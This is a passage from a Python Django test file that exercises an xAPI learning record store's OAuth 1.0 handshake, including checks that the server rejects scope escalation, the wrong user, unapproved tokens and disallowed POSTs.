oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback
del oauth_header_request_token_params_dict['OAuth realm']
# add scope to the existing params
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_PLAINTEXT()
signature = signature_method.sign(oauth_request, self.consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
token = Token.objects.get(consumer=self.consumer)
# =================================================
# Test AUTHORIZE
param = {'oauth_token': token.key}
authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(param))
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 302)
self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location'])
self.assertIn(token.key, auth_resp['Location'])
self.client.login(username='jane', password='toto')
self.assertEqual(token.is_approved, False)
# After being redirected to login and logging in again, try get again
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 200) # Show return/display OAuth authorized view
# Increase power of scope here - not allowed
auth_form = auth_resp.context['form']
data = auth_form.initial
data['authorize_access'] = 1
data['oauth_token'] = token.key
data['scopes'] = ['all']
auth_post = self.client.post(AUTHORIZATION_ENDPOINT, data)
self.assertEqual(auth_post.status_code, 401)
self.assertEqual(auth_post.content, 'Action not allowed.')
def test_auth_wrong_auth(self):
param = {
'scope':'statements/read',
'consumer_name':'new_client'
}
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param))
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"PLAINTEXT\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/access_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback
del oauth_header_request_token_params_dict['OAuth realm']
# add scope to the existing params
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_PLAINTEXT()
signature = signature_method.sign(oauth_request, self.consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
token = Token.objects.get(consumer=self.consumer)
# =================================================
# Test AUTHORIZE
param = {'oauth_token': token.key}
authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(param))
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 302)
self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location'])
self.assertIn(token.key, auth_resp['Location'])
# Login with wrong user the client is associated with
self.client.login(username='dick', password='lassie')
self.assertEqual(token.is_approved, False)
# After being redirected to login and logging in again, try get again
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 403) # Show return/display OAuth authorized view
self.assertEqual(auth_resp.content, 'Invalid user for this client.')
def test_auth_no_scope_chosen(self):
param = {
'scope':'statements/read',
'consumer_name':'new_client'
}
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param))
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"PLAINTEXT\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/access_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback
del oauth_header_request_token_params_dict['OAuth realm']
# add scope to the existing params
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_PLAINTEXT()
signature = signature_method.sign(oauth_request, self.consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
token = Token.objects.get(consumer=self.consumer)
# =================================================
# Test AUTHORIZE
param = {'oauth_token': token.key}
authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(param))
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 302)
self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location'])
self.assertIn(token.key, auth_resp['Location'])
self.client.login(username='jane', password='toto')
self.assertEqual(token.is_approved, False)
# After being redirected to login and logging in again, try get again
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 200) # Show return/display OAuth authorized view
# User must select at least one scope
auth_form = auth_resp.context['form']
data = auth_form.initial
data['authorize_access'] = 1
data['oauth_token'] = token.key
data['scopes'] = []
auth_post = self.client.post(AUTHORIZATION_ENDPOINT, data)
self.assertEqual(auth_post.status_code, 401)
self.assertEqual(auth_post.content, 'Action not allowed.')
def test_access_token_invalid_token(self):
param = {
'scope':'all',
'consumer_name':'new_client'
}
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param))
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"PLAINTEXT\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/access_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback
del oauth_header_request_token_params_dict['OAuth realm']
# add scope to the existing params
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_PLAINTEXT()
signature = signature_method.sign(oauth_request, self.consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
token = Token.objects.get(consumer=self.consumer)
# ==================================================
# Test AUTHORIZE
param = {'oauth_token': token.key}
authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(param))
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 302)
self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location'])
self.assertIn(token.key, auth_resp['Location'])
self.client.login(username='jane', password='toto')
self.assertEqual(token.is_approved, False)
# After being redirected to login and logging in again, try get again
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 200) # Show return/display OAuth authorized view
auth_form = auth_resp.context['form']
data = auth_form.initial
data['authorize_access'] = 1
data['oauth_token'] = token.key
auth_post = self.client.post(AUTHORIZATION_ENDPOINT, data)
self.assertEqual(auth_post.status_code, 302)
# Check if oauth_verifier and oauth_token are returned
self.assertIn('http://example.com/access_token_ready?oauth_verifier=', auth_post['Location'])
self.assertIn('oauth_token=', auth_post['Location'])
access_token = Token.objects.get(consumer=self.consumer)
self.assertIn(access_token.key, auth_post['Location'])
self.assertEqual(access_token.is_approved, True)
# Set is approved false for the token
access_token.is_approved = False
access_token.save()
# Test ACCESS TOKEN
oauth_header_access_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_token=\"%s\","\
"oauth_signature_method=\"PLAINTEXT\","\
"oauth_signature=\"%s&%s\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"accessnonce\","\
"oauth_version=\"1.0\","\
"oauth_verifier=\"%s\"" % (self.consumer.key,token.key,self.consumer.secret,token.secret,str(int(time.time())),token.verifier)
access_resp = self.client.get(TOKEN_ENDPOINT, Authorization=oauth_header_access_params)
self.assertEqual(access_resp.status_code, 401)
self.assertEqual(access_resp.content, "Request Token not approved by the user.")
def test_access_token_access_resources(self):
param = {
'scope':'all',
'consumer_name':'new_client'
}
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param))
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"PLAINTEXT\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"12345678\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/access_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback
del oauth_header_request_token_params_dict['OAuth realm']
# add scope to the existing params
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_PLAINTEXT()
signature = signature_method.sign(oauth_request, self.consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
token = Token.objects.get(consumer=self.consumer)
# =========================================================
# Test AUTHORIZE
param = {'oauth_token': token.key}
authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(param))
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 302)
self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location'])
self.assertIn(token.key, auth_resp['Location'])
self.client.login(username='jane', password='toto')
self.assertEqual(token.is_approved, False)
# After being redirected to login and logging in again, try get again
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 200) # Show return/display OAuth authorized view
auth_form = auth_resp.context['form']
data = auth_form.initial
data['authorize_access'] = 1
data['oauth_token'] = token.key
auth_post = self.client.post(AUTHORIZATION_ENDPOINT, data)
self.assertEqual(auth_post.status_code, 302)
# Check if oauth_verifier and oauth_token are returned
self.assertIn('http://example.com/access_token_ready?oauth_verifier=', auth_post['Location'])
self.assertIn('oauth_token=', auth_post['Location'])
request_token = Token.objects.get(consumer=self.consumer)
self.assertIn(request_token.key, auth_post['Location'])
self.assertEqual(request_token.is_approved, True)
# ===========================================================
# Test ACCESS TOKEN
oauth_header_access_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_token=\"%s\","\
"oauth_signature_method=\"PLAINTEXT\","\
"oauth_signature=\"%s&%s\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"87654321\","\
"oauth_version=\"1.0\","\
"oauth_verifier=\"%s\"" % (self.consumer.key,token.key,self.consumer.secret,request_token.secret,str(int(time.time())),request_token.verifier)
access_resp = self.client.get(TOKEN_ENDPOINT, Authorization=oauth_header_access_params)
self.assertEqual(access_resp.status_code, 200)
content = access_resp.content.split('&')
access_token_secret = content[0].split('=')[1]
access_token_key = content[1].split('=')[1]
access_token = Token.objects.get(secret=access_token_secret, key=access_token_key)
# ==============================================================
# Test ACCESS RESOURCE
oauth_header_resource_params = "OAuth realm=\"test\", "\
"oauth_consumer_key=\"%s\","\
"oauth_token=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"accessresourcenonce\","\
"oauth_version=\"1.0\"" % (self.consumer.key, access_token.key, str(int(time.time())))
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
path = TEST_SERVER + "/XAPI/statements"
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
# Create signature and add it to the headers
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
resp = self.client.get(path, Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 200)
def test_unicode(self):
# All client requests have the auth as unicode
# ============= INITIATE =============
param = {
'scope':'all',
'consumer_name':'new_client'
}
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param))
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"12345678\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/access_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback
del oauth_header_request_token_params_dict['OAuth realm']
# add scope to the existing params
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
request_resp = self.client.get(request_token_path, Authorization=unicode(oauth_header_request_token_params))
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
token = Token.objects.get(consumer=self.consumer)
# ============= END INITIATE =============
# ============= AUTHORIZE =============
param = {'oauth_token': token.key}
authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(param))
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 302)
self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location'])
self.assertIn(token.key, auth_resp['Location'])
self.client.login(username='jane', password='toto')
self.assertEqual(token.is_approved, False)
# After being redirected to login and logging in again, try get again
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 200) # Show return/display OAuth authorized view
auth_form = auth_resp.context['form']
data = auth_form.initial
data['authorize_access'] = 1
data['oauth_token'] = token.key
auth_post = self.client.post(AUTHORIZATION_ENDPOINT, data)
self.assertEqual(auth_post.status_code, 302)
# Check if oauth_verifier and oauth_token are returned
self.assertIn('http://example.com/access_token_ready?oauth_verifier=', auth_post['Location'])
self.assertIn('oauth_token=', auth_post['Location'])
request_token = Token.objects.get(consumer=self.consumer)
self.assertIn(request_token.key, auth_post['Location'])
self.assertEqual(request_token.is_approved, True)
# ============= END AUTHORIZE =============
# ============= ACCESS TOKEN =============
oauth_header_access_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_token=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"87654321\","\
"oauth_version=\"1.0\","\
"oauth_verifier=\"%s\"" % (self.consumer.key,token.key,str(int(time.time())),request_token.verifier)
# from_token_and_callback takes a dictionary
param_list = oauth_header_access_params.split(",")
oauth_header_access_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_access_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_access_params_dict['OAuth realm']
oauth_request = oauth.Request.from_token_and_callback(request_token, http_method='GET',
http_url=TOKEN_ENDPOINT, parameters=oauth_header_access_params_dict)
# Create signature and add it to the headers
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, request_token)
oauth_header_access_params += ',oauth_signature="%s"' % signature
access_resp = self.client.get(TOKEN_ENDPOINT, Authorization=unicode(oauth_header_access_params))
self.assertEqual(access_resp.status_code, 200)
content = access_resp.content.split('&')
access_token_secret = content[0].split('=')[1]
access_token_key = content[1].split('=')[1]
access_token = Token.objects.get(secret=access_token_secret, key=access_token_key)
# ============= END ACCESS TOKEN =============
# ============= ACCESS RESOURCE =============
oauth_header_resource_params = "OAuth realm=\"test\", "\
"oauth_consumer_key=\"%s\","\
"oauth_token=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"accessresourcenonce\","\
"oauth_version=\"1.0\"" % (self.consumer.key, access_token.key, str(int(time.time())))
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
path = TEST_SERVER + "/XAPI/statements"
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
# Create signature and add it to the headers
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
resp = self.client.get(path, Authorization=unicode(oauth_header_resource_params), X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 200)
def test_oauth_disabled(self):
# Disable oauth
if settings.OAUTH_ENABLED:
settings.OAUTH_ENABLED = False
put_guid = str(uuid.uuid1())
stmt = json.dumps({"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bill"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/accessed","display": {"en-US":"accessed"}},
"object": {"id":"act:test_put"}})
param = {"statementId":put_guid}
path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param))
oauth_header_resource_params, access_token = self.oauth_handshake()
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='PUT',
http_url=path, parameters=oauth_header_resource_params_dict)
# build signature and add to the params
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
# Put statements
resp = self.client.put(path, data=stmt, content_type="application/json",
Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 400)
self.assertEqual(resp.content, "OAuth is not enabled. To enable, set the OAUTH_ENABLED flag to true in settings")
def test_stmt_put(self):
# build stmt data and path
put_guid = str(uuid.uuid1())
stmt = json.dumps({"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bill"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/accessed","display": {"en-US":"accessed"}},
"object": {"id":"act:test_put"}})
param = {"statementId":put_guid}
path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param))
# Get oauth header params and access token
oauth_header_resource_params, access_token = self.oauth_handshake()
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request to PUT the stmt
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='PUT',
http_url=path, parameters=oauth_header_resource_params_dict)
# build signature and add to the params
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
# Put statements
resp = self.client.put(path, data=stmt, content_type="application/json",
Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 204)
def test_stmt_post_no_scope(self):
stmt = {"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}},
"object": {"id":"act:test_post"}}
stmt_json = json.dumps(stmt)
# Don't send scope so it defaults to statements/write and statements/read/mine
oauth_header_resource_params, access_token = self.oauth_handshake(scope=False)
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth_request and apply signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='POST',
http_url='http://testserver/XAPI/statements/', parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
post = self.client.post('/XAPI/statements/', data=stmt_json, content_type="application/json",
Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(post.status_code, 200)
def test_stmt_simple_get(self):
guid = str(uuid.uuid1())
stmt_data = {"id":guid,"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}},
"object": {"id":"act:test_simple_get"}, "authority":{"objectType":"Agent", "mbox":"mailto:[email protected]"}}
stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json",
Authorization=self.jane_auth, X_Experience_API_Version="1.0.0")
self.assertEqual(stmt_post.status_code, 200)
param = {"statementId":guid}
path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param))
oauth_header_resource_params, access_token = self.oauth_handshake()
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and apply signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
resp = self.client.get(path, Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 200)
rsp = resp.content
self.assertIn(guid, rsp)
def test_stmt_complex_get(self):
stmt_data = {"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}},
"object": {"id":"act:test_complex_get"}, "authority":{"objectType":"Agent", "mbox":"mailto:[email protected]"}}
stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json",
Authorization=self.jane_auth, X_Experience_API_Version="1.0.0")
self.assertEqual(stmt_post.status_code, 200)
param = {"activity":"act:test_complex_get"}
path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param))
oauth_header_resource_params, access_token = self.oauth_handshake()
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and apply signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
resp = self.client.get(path,Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 200)
def test_stmt_get_then_wrong_scope(self):
guid = str(uuid.uuid1())
stmt_data = {"id":guid,"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}},
"object": {"id":"act:test_simple_get"}, "authority":{"objectType":"Agent", "mbox":"mailto:[email protected]"}}
stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json",
Authorization=self.jane_auth, X_Experience_API_Version="1.0.0")
self.assertEqual(stmt_post.status_code, 200)
param = {"statementId":guid}
path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param))
oauth_header_resource_params, access_token = self.oauth_handshake(scope_type="statements/read profile")
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature to get statements
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
resp = self.client.get(path,Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 200)
rsp = resp.content
self.assertIn(guid, rsp)
# =============================================
# Test POST (not allowed)
post_stmt = {"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}},
"object": {"id":"act:test_post"}}
post_stmt_json = json.dumps(post_stmt)
# Use same oauth headers, change the nonce
oauth_header_resource_params_dict['oauth_nonce'] = 'another_nonce'
# create another oauth request
oauth_request2 = oauth.Request.from_token_and_callback(access_token, http_method='POST',
http_url='http://testserver/XAPI/statements/', parameters=oauth_header_resource_params_dict)
signature_method2 = oauth.SignatureMethod_HMAC_SHA1()
signature2 = signature_method2.sign(oauth_request2, self.consumer, access_token)
# Replace old signature and add the new one
oauth_header_resource_params = oauth_header_resource_params.replace('"%s"' % signature, '"%s"' % signature2)
# replace headers with the nonce you added in dict
oauth_header_resource_params = oauth_header_resource_params.replace('oauth_nonce="resource_nonce"','oauth_nonce="another_nonce"')
post = self.client.post('/XAPI/statements/', data=post_stmt_json, content_type="application/json",
Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(post.status_code, 403)
self.assertEqual(post.content, 'Incorrect permissions to POST at /statements')
def test_activity_state_put_then_wrong_scope(self):
url = TEST_SERVER + '/XAPI/activities/state'
testagent = '{"name":"jane","mbox":"mailto:[email protected]"}'
activityId = "http://www.iana.org/domains/example/"
stateId = "id:the_state_id"
activity = Activity(activity_id=activityId)
activity.save()
testparams = {"stateId": stateId, "activityId": activityId, "agent": testagent}
teststate = {"test":"put activity state 1"}
path = '%s?%s' % (url, urllib.urlencode(testparams))
oauth_header_resource_params, access_token = self.oauth_handshake(scope_type='state')
# from_token_and_callback takes a dictionary
